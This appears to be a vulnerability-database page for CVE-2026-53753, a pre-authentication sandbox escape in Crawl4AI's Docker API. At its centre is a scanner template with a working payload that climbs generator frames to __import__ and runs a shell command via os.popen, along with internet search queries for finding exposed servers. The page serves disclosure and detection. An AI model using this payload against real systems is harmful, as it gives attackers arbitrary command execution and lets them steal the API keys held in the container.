Crawl4AI <= 0.8.6 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Exploit for Improper Control of Dynamically-Managed Code Resources in Kidocode Crawl4Ai | 29 Jun 202620:36 | – | githubexploit | |
| Exploit for Improper Control of Dynamically-Managed Code Resources in Kidocode Crawl4Ai | 2 Jul 202600:32 | – | githubexploit | |
| CVE-2026-53753 | 23 Jun 202618:17 | – | attackerkb | |
| CVE-2026-53753 | 23 Jun 202620:39 | – | circl | |
| CVE-2026-53753 | 23 Jun 202618:17 | – | cve | |
| CVE-2026-53753 Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API | 23 Jun 202618:17 | – | cvelist | |
| EUVD-2026-38569 | 23 Jun 202618:17 | – | euvd | |
| Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API | 16 Jun 202620:13 | – | github | |
| Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API | 16 Jun 202600:00 | – | gitlab | |
| CVE-2026-53753 | 23 Jun 202619:17 | – | nvd |
10
id: CVE-2026-53753
info:
name: Crawl4AI <= 0.8.6 - Remote Code Execution
author: aryu-ru,q1uf3ng,August829
severity: critical
description: |
Crawl4AI through 0.8.6 ships a Docker API server that exposes an unauthenticated /crawl endpoint. The computed field type of JsonCssExtractionStrategy evaluates a user supplied expression inside an AST based sandbox that does not restrict attribute access on generator frame objects. A generator expression can therefore reach gi_frame.f_back, walk the caller chain to f_builtins, recover __import__ and execute arbitrary operating system commands as the user running the container.
impact: |
An unauthenticated attacker can execute arbitrary operating system commands inside the crawler container, read or tamper with crawled data, steal provider API keys held in the container environment, and pivot into any network the container can reach.
remediation: |
Upgrade Crawl4AI to version 0.8.7 or later, where computed field expressions are disabled.
reference:
- https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7
- https://github.com/unclecode/crawl4ai/pull/1855
- https://github.com/unclecode/crawl4ai/pull/1886
- https://github.com/pypa/advisory-database/tree/main/vulns/crawl4ai/PYSEC-2026-319.yaml
- https://nvd.nist.gov/vuln/detail/CVE-2026-53753
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id: CVE-2026-53753
cwe-id: CWE-94
metadata:
verified: true
max-request: 2
vendor: unclecode
product: crawl4ai
shodan-query: http.title:"Crawl4AI Playground"
fofa-query: title="Crawl4AI Playground"
tags: cve,cve2026,crawl4ai,unclecode,rce,sandbox-escape
variables:
marker: "{{to_lower(rand_base(6))}}"
http:
- raw:
- |
POST /crawl HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"urls": [
"raw://<html><body><div>crawl4ai</div></body></html>"
],
"crawler_config": {
"type": "CrawlerRunConfig",
"params": {
"extraction_strategy": {
"type": "JsonCssExtractionStrategy",
"params": {
"schema": {
"name": "probe",
"baseSelector": "div",
"fields": [
{
"name": "probe",
"type": "computed",
"expression": "(lambda L: (L.append((L[0].gi_frame.f_back.f_back.f_back.f_builtins['__import__']('os').popen('echo {{marker}}$((31337*1337))').read() for q in [1])), list(L[0]))[1])([])"
}
]
}
}
}
}
}
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{marker}}41897569"
- type: word
part: body
words:
- '"server_processing_time_s"'
- '"extracted_content"'
condition: and
- type: status
status:
- 200
# digest: 4b0a004830460221008b1d425ccce70595f3a381c90b133739a22bf5af56abc518ca43b2fc60d456fb022100cd652aa7a96dea5fa7be59d33490bf289eb7f19aa0a7860e753248c73e799531:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2026 13:27Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8 - 10
EPSS0.0061
SSVC